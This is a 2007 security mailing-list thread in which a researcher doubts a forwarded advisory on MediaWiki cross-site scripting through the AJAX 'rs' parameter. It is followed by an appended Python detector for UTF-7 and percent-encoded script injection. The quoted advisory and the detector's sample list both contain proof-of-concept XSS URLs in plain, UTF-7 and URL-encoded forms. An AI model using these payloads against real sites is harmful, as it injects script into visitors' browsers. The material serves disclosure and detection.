[VIM] [unsure] MediaWiki Cross-site Scripting

Sullo sullo at cirt.net
Tue Feb 20 19:09:47 EST 2007


$wgUseAjax is off by default--in fact in my install I don't even have
that in the config file.

I didn't try very hard, but I couldn't get it to work either (after
turning wgUseAjax on).


Noam Rathaus wrote:
> Anyone able to confirm this? I can't.
>
> ----------  Forwarded Message  ----------
>
> Subject: MediaWiki Cross-site Scripting
> Date: Tuesday 20 February 2007 06:29
> From: eyal at bugsec.com
> To: bugtraq at securityfocus.com
>
> MediaWiki Cross-site Scripting Vulnerabilities.
>
>
> Date:
> 18/02/2007
>
> Vendor:
> MediaWiki
>
> Vulnerable versions:
> MediaWiki 1.9.2 (latest) and below.
>
> Description:
> MediaWiki v1.8.2 and below are vulnerable to plain Cross-site scripting
>  attack by exploiting the experimental AJAX features, if enabled (default).
>  This XSS was fixed in post 1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1,
>  1.9.2). This fix can be bypassed by encoding the XSS exploit to UTF-7. Note:
>  the browser's encoding auto-detection has to be enabled for successful
>  exploitation.
>
>
> Proof-of-concept:
> http://[Host]/wiki/index.php?action=ajax&rs=[XSS]
> UTF-7 XSS in post 1.8.2 versions.
>
> Examples:
> v1.8.2 and below:
> http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://www.bugsec.com')%3C/script%3E
>
> v1.8.3 - v1.9.2:
> http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http://www.bugsec.com');+ADw-/SCRIPT+AD4-
> http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43%52%49%50%54%2B%41%44%34%2D (URL Encoded)
>
>
> Credit:
> Moshe BA from BugSec
> Tel:+972-3-9622655
> Email: Info [^A-t] BugSec \*D.O.T*\ com
> BugSec LTD. - www.BugSec.com
> http://www.bugsec.com/articles.php?Security=24
>
> -------------------------------------------------------
>


-- 

http://www.cirt.net/      |     http://www.osvdb.org/
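A defender-side check for the two encoding layers the quoted advisory describes (percent-encoding, then UTF-7 shift sequences that a charset-sniffing browser would honour), added here as an example; it is not code from this thread or from MediaWiki. The request URLs are constructed for the example (placeholder host `wiki.example.invalid`; the `rs` values are the three forms quoted above), and the function names are my own.

```python
import re
from urllib.parse import unquote, urlsplit

# Sample request URLs, constructed for this example. The "rs" values are the
# three payload forms quoted in the advisory above; the host is a placeholder.
SAMPLE_REQUESTS = [
    "http://wiki.example.invalid/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://www.bugsec.com')%3C/script%3E",
    "http://wiki.example.invalid/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http://www.bugsec.com');+ADw-/SCRIPT+AD4-",
    "http://wiki.example.invalid/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43%52%49%50%54%2B%41%44%34%2D",
    "http://wiki.example.invalid/wiki/index.php?title=Main_Page&action=edit",
]

# A UTF-7 shift sequence: '+' followed by modified-base64 and an optional '-'.
UTF7_SHIFT = re.compile(r"\+[A-Za-z0-9+/]+-?")
# An opening or closing <script> tag, whitespace- and case-tolerant.
SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def candidate_decodings(raw_value):
    """Yield (layer, text) for each interpretation a browser might give the value.

    Percent-decoding here keeps a literal '+' (unquote, not unquote_plus):
    form-style decoding would turn it into a space and hide a UTF-7 shift
    sequence, and a detector should see what a charset-sniffing browser sees.
    """
    text = unquote(raw_value)
    yield "plain", text
    if UTF7_SHIFT.search(text):
        try:
            yield "utf-7", text.encode("ascii").decode("utf-7")
        except (UnicodeEncodeError, UnicodeDecodeError):
            pass  # not valid UTF-7; the plain layer already covered it


def find_script_injection(url):
    """Return {parameter: layer} for each query parameter whose value decodes
    to a <script> tag at some layer ('plain' or 'utf-7')."""
    hits = {}
    for pair in urlsplit(url).query.split("&"):
        name, _, raw = pair.partition("=")
        for layer, text in candidate_decodings(raw):
            if SCRIPT_TAG.search(text):
                hits[name] = layer
                break
    return hits


def scan_requests(urls):
    """Summarise findings for a batch of request URLs, e.g. from an access log."""
    return [(url, find_script_injection(url)) for url in urls]


if __name__ == "__main__":
    for url, hits in scan_requests(SAMPLE_REQUESTS):
        verdict = ", ".join(f"{p} ({layer})" for p, layer in hits.items()) or "clean"
        print(f"{verdict:14} {url}")
```

The UTF-7 layer is why a fix that only HTML-escapes the reflected value can be bypassed: the bytes `+ADw-` contain no `<` for an escaper to see, and only a browser guessing the charset turns them into a tag. The corresponding server-side hardening is therefore to declare the charset explicitly on the response (for example `Content-Type: text/html; charset=UTF-8`) so no auto-detection takes place, in addition to escaping.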